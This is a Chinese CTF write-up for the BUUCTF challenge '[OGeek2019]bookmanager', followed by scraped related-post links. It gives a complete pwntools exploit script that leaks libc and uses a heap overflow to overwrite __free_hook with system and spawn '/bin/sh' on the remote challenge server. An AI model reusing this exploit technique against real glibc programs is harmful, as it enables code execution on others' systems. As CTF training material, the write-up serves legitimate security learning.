做过的代码量最大的一个题

说出的好也好,不好也不好,利用点很简单,就是一个大规模的heapoverflow,就是逆起来有点儿难度

思路很简单,就是利用堆溢出覆盖结构体中的指针为__free_hook,然后改freehook

给整吐了,做了俩小时,然后本地到了最后一步,freehook每次内容都是一个奇怪的值,就是改不了system,然后远程一打就通了-.-||

 1 from pwn import *

 2

 3 local = 0

 4

 5 binary = "./pwn"

 6

 7 if local == 1:

 8     p = process(binary)

 9 else:

10     p = remote("node3.buuoj.cn",27329)

11

12 def dbg():

13     context.log_level = 'debug'

14

15 context.terminal = ['tmux','splitw','-h']

16

17 def create_book(name):

18     p.sendafter('Name of the book you want to create:',name)

19

20 def add_chapter(name):

21     p.sendlineafter('Your choice:','1')

22     p.sendafter('Chapter name:',name)

23

24 def add_section(chapter_name,name):

25     p.sendlineafter('Your choice:','2')

26     p.sendafter('Which chapter do you want to add into:',chapter_name)

27     p.sendafter('Section name:',name)

28

29 def add_text(section_name,size,name):

30     p.sendlineafter('Your choice:','3')

31     p.sendafter('Which section do you want to add into:',section_name)

32     p.sendafter('How many chapters you want to write:',str(size))

33     p.sendafter('Text:',name)

34

35 def remove_chapter(chapter_name):

36     p.sendlineafter('Your choice:','4')

37     p.sendafter('Chapter name:',chapter_name)

38

39 def remove_section(section_name):

40     p.sendlineafter('Your choice:','5')

41     p.sendafter('Section name:',section_name)

42

43 def remove_text(section_name):

44     p.sendlineafter('Your choice:','6')

45     p.sendafter('Section name:',section_name)

46

47 def show():

48     p.sendlineafter('Your choice:','7')

49

50 def edit_text(sectionname,newname):

51     p.sendlineafter('Your choice:','8')

52     p.sendlineafter('What to update?(Chapter/Section/Text):','Text')

53     p.sendafter('Section name:',sectionname)

54     p.sendafter('New Text:',newname)

55

56 def edit_section(old_sectionname,newname):

57     p.sendlineafter('Your choice:','8')

58     p.sendlineafter('What to update?(Chapter/Section/Text):','Section')

59     p.sendafter('Section name:',old_sectionname)

60     p.sendafter('New Section name:',newname)

61

62 libc = ELF('./libc-2.23.so')

63

64 create_book('lemon')

65

66 print "==== step1: leak libc ===="

67 add_chapter('one')

68 add_section('one','c' * 8)

69 add_text('c' * 8,0x80,'d' * 8)

70

71 add_chapter('\x01')

72

73 remove_text('cccccccc')

74 add_text('cccccccc',0x80,'aaaaaaaa')

75 show()

76 __malloc_hook = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 88 - 0x10

77 libc_base = __malloc_hook - libc.sym['__malloc_hook']

78 __free_hook = libc_base + libc.sym['__free_hook']

79 system = libc_base + libc.sym['system']

80 print "libc base: ",hex(libc_base)

81

82 print "==== step2: heapoverflow make heap pointer to free hook ===="

83 add_text('cccccccc',0x10,'\x01')

84 payload = '/bin/sh\x00' + 'a' * 8 + p64(0) + p64(0x41) + 'dddddddd' + p64(0) * 3 + p64(__free_hook)

85 add_section('one','dddddddd')

86 #dbg()

87 edit_text('cccccccc',payload)

88 edit_text('dddddddd',p64(system))

89 remove_text('cccccccc')

90

91 #gdb.attach(p)

92 p.interactive()

[OGeek2019]bookmanager的更多相关文章

  1. execution(* *..BookManager.save(..))的解读

    execution(* *..BookManager.save(..))的解读: 第一颗* 代表ret-type-pattern 返回值可任意, *..BookManager 代表任意Pacakge里 ...

  2. [BUUCTF]PWN7——[OGeek2019]babyrop

    [BUUCTF]PWN7--[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启 ...

  3. buuctf@[OGeek2019]babyrop

    #!/usr/bin/python #coding:utf-8 from pwn import * #context.log_level = 'debug' io = process('./pwn', ...

  4. 张高兴的 UWP 开发笔记:横向 ListView

    ListView 默认的排列方向是纵向 ( Orientation="Vertical" ) ,但如果我们需要横向显示的 ListView 怎么办? Blend for Visua ...

  5. AIDL使用解析

    简书本文地址:点击跳转到简书查看 之前面试的时候被问到这个问题,然而当时只有一个大致的印象,随GG,于是我就重新整理的一下.这里大力推荐<Android开发艺术探索>这本书,写的太好了! ...

  6. Android 进程通信机制之 AIDL

    什么是 AIDL AIDL 全称 Android Interface Definition Language,即 安卓接口描述语言.听起来很深奥,其实它的本质就是生成进程间通信接口的辅助工具.它的存在 ...

  7. 设计模式之美:Manager(管理器)

    索引 意图 结构 参与者 适用性 效果 实现 实现方式(一):Manager 模式的示例实现. 意图 将对一个类的所有对象的管理封装到一个单独的管理器类中. 这使得管理职责的变化独立于类本身,并且管理 ...

  8. Lucene.net站内搜索—6、站内搜索第二版

    目录 Lucene.net站内搜索—1.SEO优化 Lucene.net站内搜索—2.Lucene.Net简介和分词Lucene.net站内搜索—3.最简单搜索引擎代码Lucene.net站内搜索—4 ...

  9. 轻松掌握:JavaScript享元模式

    享元模式 在JavaScript中,浏览器特别是移动端的浏览器分配的内存很有限,如何节省内存就成了一件非常有意义的事情.节省内存的一个有效方法是减少对象的数量. 享元模式(Flyweight),运行共 ...

随机推荐

  1. 关于bat脚本中的命令状态码相关的%errorlevel%变量

    bat脚本中常用%errorlevel%表达上一条命令的返回值,即命令执行状态码.也称命令退出码 一般上一条命令的执行结果返回的值只有两种,0和非0 (如常见的1,2,4,5,9009等等),0一般会 ...

  2. JVM学习(六)JVM常见知识问答

    文章更新时间:2020/04/21 1.什么是Java虚拟机?为什么Java被称作是"平台无关的编程语言"? Java虚拟机是一个可以执行Java字节码的虚拟机进程. Java源文 ...

  3. 针对于Java的35 个代码性能优化总结

    针对于Java的35 个代码性能优化总结前言代码优化,一个很重要的课题.可能有些人觉得没用,一些细小的地方有什么好修改的,改与不改对于代码的运行效率有什么影响呢?这个问题我是这么考虑的,就像大海里面的 ...

  4. 关于人人开源renren-fast-vue 中npm install各种报错的解决方案

    首先吐槽一下,因为这个问题我整了好几天,把报错信息复制百度,试遍了各种方法,node.js我是卸载了安装,安装了卸载,甚至renren-fast-vue我也删了再下,然后再删,无限循环.然而没有什么软 ...

  5. 实践案例丨利用小熊派开发板获取土壤湿度传感器的ADC值

    摘要:一文带你用小熊派开发板动手做土壤湿度传感器. 一.实验准备 1.实验环境 一块stm32开发板(推荐使用小熊派),以及数据线 已经安装STM32CubeMX 已经安装KeilMDK,并导入stm ...

  6. 玩转Libmodbus(一) 搭建开发环境

    这篇文章是转载的,我主要是参考了其搭建环境的部分. 转载自: https://blog.csdn.net/qq_40452910/article/details/88560310 一.源码下载 1.l ...

  7. 087 01 Android 零基础入门 02 Java面向对象 02 Java封装 01 封装的实现 01 封装的概念和特点

    087 01 Android 零基础入门 02 Java面向对象 02 Java封装 01 封装的实现 01 封装的概念和特点 本文知识点:封装的概念和特点 说明:因为时间紧张,本人写博客过程中只是对 ...

  8. Arduino 串行外设接口——W3Cschool

    来源:https://www.w3cschool.cn/arduino/arduino_serial_peripheral_interface.html Arduino 串行外设接口 由 drbear ...

  9. 小白安装使用Redis

    Redis属于NoSql中的键值数据库,非常适合海量数据读写. 之前用过mongo但是没有用过redis,今天来学习安装redis. 先去官网下载redis安装包 redis官网 redis是c语言编 ...

  10. Semaphore最详细解析

    官方解释: 一个计数信号量.在概念上,信号量维持一组许可证.如果有必要,每个acquire()都会阻塞,直到许可证可用,然后才能使用它.每个release()添加许可证,潜在地释放阻塞获取方.但是,没 ...